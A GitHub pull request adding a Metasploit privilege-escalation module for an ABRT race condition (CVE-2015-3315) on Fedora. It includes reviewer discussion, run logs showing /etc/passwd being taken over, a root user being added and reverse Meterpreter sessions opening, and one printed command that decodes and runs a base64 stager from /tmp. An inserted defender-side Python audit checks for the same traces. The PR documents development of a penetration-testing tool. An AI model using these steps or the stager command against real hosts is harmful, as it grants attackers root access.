
Add ABRT raceabrt Privilege Escalation module #9422

Merged
merged 5 commits into from Feb 11, 2018

Conversation

bcoles commented Jan 16, 2018

Add ABRT raceabrt Privilege Escalation module.

    This module attempts to gain root privileges on Fedora systems with
    a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured
    as the crash handler.

    A race condition allows local users to change ownership of arbitrary
    files (CVE-2015-3315). This module uses a symlink attack on
    '/var/tmp/abrt/*/maps' to change the ownership of /etc/passwd,
    then adds a new user with UID=0 GID=0 to gain root privileges.
    Winning the race could take a few minutes.

    This module has been tested successfully on ABRT packaged version
    2.2.1-1.fc19 on Fedora 19 x86_64 and 2.2.2-2.fc20 on Fedora 20 x86_64.
    Fedora 21 and Red Hat 7 systems are reportedly affected, but untested.

Verification

  • Start msfconsole
  • Get a session
  • use exploit/linux/local/abrt_raceabrt_priv_esc
  • set SESSION <ID>
  • run
  • Verify you get a root session

Example Output

msf > use exploit/linux/local/abrt_raceabrt_priv_esc 
msf exploit(linux/local/abrt_raceabrt_priv_esc) > set session 1
session => 1
msf exploit(linux/local/abrt_raceabrt_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Writing '/tmp/.goXyr' (64240 bytes) ...
[*] Trying to own '/etc/passwd' - This might take a few minutes (Timeout: 900s) ...
[+] Success! '/etc/passwd' is writable
[*] Adding MKaocvEj user to /etc/passwd ...
[*] Writing '/tmp/.YcrXQ7SwC' (207 bytes) ...
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.137:38280) at 2018-01-16 09:16:18 -0500
[+] Deleted /tmp/.goXyr
[+] Deleted /tmp/.YcrXQ7SwC

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Fedora 20 (Linux 3.19.8-100.fc20.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
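A defender-side audit for the precondition and the footprint described in this PR, as an added example that is not part of the Metasploit module or of the PR itself. It treats the abrt-hook-ccpp hook name, the core_pattern sample and the passwd lines as assumed/constructed data.

```python
"""Defender-side audit for the ABRT race described in the PR above (CVE-2015-3315).
Added example, not code from the Metasploit module or this PR. It checks the
precondition the module's own check relies on (ABRT registered as the kernel
core_pattern handler) and the footprint the exploit leaves behind: /etc/passwd
owned by a non-root user, a second UID 0 account, and a 'maps' entry under the
dump directory that is a symlink instead of a regular file. Demo data is constructed."""
import os
import tempfile

ABRT_HOOK = "abrt-hook-ccpp"  # name of the abrt-ccpp core-dump hook binary (assumed)


def abrt_is_crash_handler(core_pattern: str) -> bool:
    """True when the kernel pipes core dumps into the ABRT ccpp hook."""
    p = core_pattern.strip()
    return p.startswith("|") and ABRT_HOOK in p


def extra_uid0_accounts(passwd_text: str) -> list:
    """Names of UID 0 accounts other than root (the module adds one)."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            found.append(fields[0])
    return found


def symlinked_maps(dump_root: str) -> list:
    """'maps' entries directly under <dump_root>/*/ that are symlinks."""
    if not os.path.isdir(dump_root):
        return []
    return [p for p in (os.path.join(dump_root, d, "maps") for d in os.listdir(dump_root))
            if os.path.islink(p)]


def audit(core_pattern, passwd_text, passwd_uid, passwd_gid, dump_root):
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    if abrt_is_crash_handler(core_pattern):
        findings.append("abrt-ccpp is the core-dump handler; keep ABRT patched")
    if (passwd_uid, passwd_gid) != (0, 0):
        findings.append("/etc/passwd is not owned by root:root")
    findings += ["extra UID 0 account: " + n for n in extra_uid0_accounts(passwd_text)]
    findings += ["symlinked maps file: " + p for p in symlinked_maps(dump_root)]
    return findings


def demo() -> list:
    """Run the audit on constructed data that mirrors the PR's verbose output."""
    passwd = ("root:x:0:0:root:/root:/bin/bash\n"
              "ubuntu:x:1000:1000::/home/ubuntu:/bin/bash\n"
              "orrycKU:x:0:0::/:/bin/bash\n")  # constructed: the user the exploit added
    root = tempfile.mkdtemp()  # stand-in for /var/tmp/abrt
    os.mkdir(os.path.join(root, "ccpp-demo.new"))
    os.symlink("/etc/passwd", os.path.join(root, "ccpp-demo.new", "maps"))
    # core_pattern value as abrt-ccpp sets it on Fedora (constructed sample)
    return audit("|/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e",
                 passwd, 1000, 0, root)
```

On a live host, pass in the contents of /proc/sys/kernel/core_pattern and /etc/passwd, the st_uid/st_gid from os.stat('/etc/passwd'), and /var/tmp/abrt as the dump root.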
h00die commented Jan 17, 2018

Awesome. This was the other module on my to-do list that I started coding, and never got around to finishing.

Gave the code a once over, things look sane to me!

bcoles commented Jan 17, 2018

@h00die cool. Yeah, I thought this might be the one you were referring to. The CVE references get a little confusing between this issue and the issues exploited in #9399.

I have a couple of concerns with this implementation.

Firstly, the use of su - <username> requires an interactive shell.

Second, it doesn't work on Meterpreter sessions. I haven't had time to investigate further, but most likely related to the timeout. cmd_exec does not appear to honor the timeout for whatever reason.

bcoles commented Jan 17, 2018

Blocked on #9429 due to issues with Meterpreter sessions.

@bcoles bcoles added the delayed label Jan 17, 2018
bcoles commented Jan 21, 2018

Delayed pending #9438

bcoles commented Jan 21, 2018

It looks like there's an issue with using su -u <username> in Meterpreter sessions which does not affect shell sessions.

@bcoles bcoles added delayed and removed delayed labels Jan 24, 2018
end

chown_file = '/etc/passwd'
username = rand_text_alpha rand(7..10)

h00die Feb 3, 2018

I'd like to see this be a non-required item. During a pentest, it'd be good to set a static name across all exploited systems (like the pentest company name), or whatever a possible agreed upon flag may be. If not given, rand it.

h00die commented Feb 3, 2018

Still need some docs on this, but this will be the next one I test since I have some of those Fedoras lying around already.

@h00die h00die self-assigned this Feb 3, 2018
h00die commented Feb 3, 2018

Fedora 20 worked for me!

msf exploit(linux/local/abrt_raceabrt_priv_esc) > set session 1
session => 1
msf exploit(linux/local/abrt_raceabrt_priv_esc) > set verbose true
verbose => true
msf exploit(linux/local/abrt_raceabrt_priv_esc) > check

[!] SESSION may not be compatible with this module.
[+] System is configured to use ABRT for crash reporting
[+] System does not appear to have been patched
[+] Directory '/var/tmp/abrt' exists
[+] abrt-ccpp service is running
[*] System is using ABRT package version 2.1.9-1.fc20
[*]  The target service is running, but could not be validated.
msf exploit(linux/local/abrt_raceabrt_priv_esc) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] System is configured to use ABRT for crash reporting
[+] System does not appear to have been patched
[+] Directory '/var/tmp/abrt' exists
[+] abrt-ccpp service is running
[*] System is using ABRT package version 2.1.9-1.fc20
[*] Writing '/tmp/.zbUQ4WFUQA' (64240 bytes) ...
[*] Max line length is 65537
[*] Writing 64240 bytes in 4 chunks of 55896 bytes (octal-encoded), using printf
[*] Next chunk is 49542 bytes
[*] Next chunk is 47886 bytes
[*] Next chunk is 41969 bytes
[*] Trying to own '/etc/passwd' - This might take a few minutes (Timeout: 900s) ...
[*] Detected ccpp-2018-02-02-20:16:49-18668.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:16:49-18670.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:16:49-18672.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:16:50-18680.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:16:50-18687.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:16:50-18691.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:16:50-18695.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:16:50-18700.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:17:46-27026.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-02-20:17:46-27031.new, attempting to race...
[*] 	Exploit successful...
[*] -rw-r--r--. 1 ubuntu abrt 1723 Jan 31 21:49 /etc/passwd
[+] Success! '/etc/passwd' is writable
[*] Adding orrycKU user to /etc/passwd ...
[*] Switching to new user...
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[*] Writing '/tmp/.Zzjw1Y' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (857352 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:60038) at 2018-02-02 20:26:24 -0500
[+] Deleted /tmp/.zbUQ4WFUQA
[+] Deleted /tmp/.Zzjw1Y

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.workGroup
OS           : Fedora 20 (Linux 3.11.10-301.fc20.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
h00die commented Feb 3, 2018

same box but via meterpreter (as you noted):

[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] System is configured to use ABRT for crash reporting
[+] System does not appear to have been patched
[+] Directory '/var/tmp/abrt' exists
[+] abrt-ccpp service is running
[*] System is using ABRT package version 2.1.9-1.fc20
[*] Writing '/tmp/.V3rm7oX' (64240 bytes) ...
[*] Trying to own '/etc/passwd' - This might take a few minutes (Timeout: 900s) ...
[*] (current) UNIX password: 
[-] Exploit aborted due to failure: unknown: Failed to own '/etc/passwd'
[*] Exploit completed, but no session was created.
bcoles commented Feb 3, 2018

Thanks @h00die

I got sidetracked with other PRs and haven't come back to this one.

Regarding the username, I agree with your suggested use case and could easily change it to an Opt.

Unfortunately this module only works with shell sessions and not meterpreter sessions, due to the use of su. Taking a look through the framework I found at least two other instances where this issue occurred, causing developers to code around the framework, which isn't ideal.

Chatting with @busterb suggested implementing "subshell" functionality in meterpreter. This would require a bit of rework and probably won't be implemented any time soon.

bcoles commented Feb 3, 2018

The easiest short term solution would be removing meterpreter as a supported session type. That's lame.

Another approach would be hard coding the payload as a Linux bind/reverse shell, then using su in on_client_connect. That's also lame.

This PR has been on the back-burner, and I've added the delayed tag, until I find a better approach.

sudo is not a viable approach in this instance, as the sudoers ownership is modified to UID != 0. No big loss - I generally prefer not to modify sudoers because reasons.

bcoles commented Feb 3, 2018

@h00die are you using the latest Metasploit / Meterpreter from git? I just noticed the (current) UNIX password: in your output. That was due to bug #9438 in cmd_exec in Linux meterpreter / mettle which has since been fixed.

The exploit still fails on the latest version from git, but fails due to su. Failed exploitation on Meterpreter should look like this:

msf5 exploit(linux/local/abrt_raceabrt_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/abrt_raceabrt_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[+] System is configured to use ABRT for crash reporting
[+] System does not appear to have been patched
[+] Directory '/var/tmp/abrt' exists
[+] abrt-ccpp service is running
[*] System is using ABRT package version 2.2.2-2.fc20
[*] Writing '/tmp/.vszljSpKz' (64240 bytes) ...
[*] Trying to own '/etc/passwd' - This might take a few minutes (Timeout: 900s) ...
[*] Detected ccpp-2018-02-03-13:23:19-91046.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-03-13:23:19-91048.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-03-13:23:19-91050.new, attempting to race...
[*] 	Didn't win, trying again!

<truncated for brevity>

[*] Detected ccpp-2018-02-03-13:25:24-101100.new, attempting to race...
[*] 	Exploit successful...
[*] -rw-r--r--. 1 user abrt 2330 Jan 25 00:05 /etc/passwd
[+] Success! '/etc/passwd' is writable
[*] Adding ktGKfJm user to /etc/passwd ...
[*] Switching to new user...
uid=1000(user) gid=1000(user) groups=1000(user),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[-] Exploit aborted due to failure: unknown: Failed to gain root privileges
[*] Exploit completed, but no session was created.
bcoles commented Feb 3, 2018

Fixed. I'll update shortly.

msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                                       Connection
  --  ----  ----                   -----------                                                       ----------
  1         shell cmd/unix                                                                           172.16.191.244:1337 -> 172.16.191.137:37848 (172.16.191.137)
  3         meterpreter x86/linux  uid=1000, gid=1000, euid=1000, egid=1000 @ localhost.localdomain  172.16.191.244:4433 -> 172.16.191.137:50273 (172.16.191.137)

msf5 exploit(multi/handler) > use exploit/linux/local/abrt_raceabrt_priv_esc 
msf5 exploit(linux/local/abrt_raceabrt_priv_esc) > set username h00die_waz_here
username => h00die_waz_here
msf5 exploit(linux/local/abrt_raceabrt_priv_esc) > set session 3
session => 3
msf5 exploit(linux/local/abrt_raceabrt_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Writing '/tmp/.gT1bRxQ' (64240 bytes) ...
[*] Trying to own '/etc/passwd' - This might take a few minutes (Timeout: 900s) ...
[+] Success! '/etc/passwd' is writable
[*] Adding h00die_waz_here user to /etc/passwd ...
[*] Writing '/tmp/.2laqV' (207 bytes) ...
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 4 opened (172.16.191.244:4444 -> 172.16.191.137:38869) at 2018-02-03 02:55:40 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
bcoles commented Feb 3, 2018

Both shell and meterpreter sessions are now supported.

I was under the impression that shell_command_token would work for both shell and meterpreter sessions, but apparently that's not the case.

For meterpreter sessions, on_new_session gets called, but none of the shell_command_token commands get executed, so the module doesn't clean up after itself for meterpreter sessions.

h00die commented Feb 3, 2018

So just waiting on docs and a retest then?

bcoles commented Feb 3, 2018

@h00die yup. Will commit shortly.

Edit: Nevermind. It will have to wait.

@bcoles bcoles added docs and removed delayed needs-docs labels Feb 4, 2018
bcoles commented Feb 4, 2018

@h00die Done. Should be good to go.

h00die commented Feb 4, 2018

I dropped a mettle based on the most recent (-dev) build, but it segfaulted (core dumped).

[-] Error: Unable to execute the following command: "echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towKgCdWgCABFRieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZtgywA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/QsBRs.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/EZWoT' < '/tmp/QsBRs.b64' ; chmod +x '/tmp/EZWoT' ; '/tmp/EZWoT' & sleep 2 ; rm -f '/tmp/EZWoT' ; rm -f '/tmp/QsBRs.b64'"
[-] Output: "/bin/sh: line 15: 18364 Segmentation fault      (core dumped) '/tmp/TpWef'"

Possible user error on this one, however I'm pretty OK to land this if anyone else will 2nd that (@busterb @wvu-r7 )

busterb commented Feb 5, 2018

I don't think a segfault should ever be user-error other than mine :) Will take a look, thanks!

h00die commented Feb 10, 2018

@busterb do you want me to wait for that segfault to then test this on mettle, or just pass it since it works on shell and made it most of the way (known issue) on mettle? I think it's good to land, but I'd also hesitate to land it if the mettle gem hasn't been pushed out yet (so others don't land in this odd situation).

bcoles commented Feb 11, 2018

Mettle gem has been updated to 0.3.7 in master. It's still 0.3.6 in this branch.

bcoles commented Feb 11, 2018

Is it possible you generated a mettle binary while on a branch with one version of the mettle gem, then used this module on a mettle session while running metasploit from a different branch with a different version of mettle?

h00die commented Feb 11, 2018

Worked after a rebase.

msf5 exploit(linux/local/abrt_raceabrt_priv_esc) > run

[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] System is configured to use ABRT for crash reporting
[+] System does not appear to have been patched
[+] Directory '/var/tmp/abrt' exists
[+] abrt-ccpp service is running
[*] System is using ABRT package version 2.1.9-1.fc20
[*] Writing '/tmp/.4TeRYgl' (64240 bytes) ...
[*] Trying to own '/etc/passwd' - This might take a few minutes (Timeout: 900s) ...
[*] Detected ccpp-2018-02-11-11:27:39-20254.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-11-11:27:39-20256.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-11-11:27:51-21725.new, attempting to race...
[*] 	Didn't win, trying again!
[*] Detected ccpp-2018-02-11-11:27:51-21730.new, attempting to race...
[*] 	Exploit successful...
[*] -rw-r--r--. 1 ragecyr abrt 1723 Jan 31 21:49 /etc/passwd
[+] Success! '/etc/passwd' is writable
[*] Adding iFXRgyYR user to /etc/passwd ...
[*] Writing '/tmp/.PiopYAJ5' (207 bytes) ...
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (857352 bytes) to 2.2.2.2
[*] Meterpreter session 5 opened (1.1.1.1:4444 -> 2.2.2.2:55515) at 2018-02-11 11:27:54 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.localGroup
OS           : Fedora 20 (Linux 3.11.10-301.fc20.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
@h00die h00die merged commit 6968172 into rapid7:master Feb 11, 2018
1 check passed
continuous-integration/travis-ci/pr The Travis CI build passed
h00die added a commit that referenced this pull request Feb 11, 2018
h00die commented Feb 11, 2018

Release Notes

The exploits/linux/local/abrt_raceabrt_priv_esc module has been added to the framework. On Fedora systems with a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured as the crash handler, a race condition allows local users to change ownership of arbitrary files. This module enables you to take ownership of the /etc/passwd file and gain root privileges.

@bcoles bcoles deleted the bcoles:abrt_raceabrt_priv_esc branch Feb 11, 2018
jmartin-r7 added a commit to jmartin-r7/metasploit-framework that referenced this pull request Feb 12, 2018